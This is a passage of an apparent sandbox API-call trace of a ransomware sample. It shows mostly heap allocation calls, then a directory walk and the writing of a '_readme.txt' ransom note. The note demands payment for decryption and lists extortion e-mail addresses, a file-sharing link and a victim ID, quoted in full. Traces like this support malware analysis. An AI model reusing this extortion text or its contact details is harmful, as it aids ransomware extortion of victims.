hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.762] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.762] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.762] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.762] PathFindFileNameW (pszPath="") returned="" [0173.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.762] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.763] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.763] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.763] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8ca68 [0173.764] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0173.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.764] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0173.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.764] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.764] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video 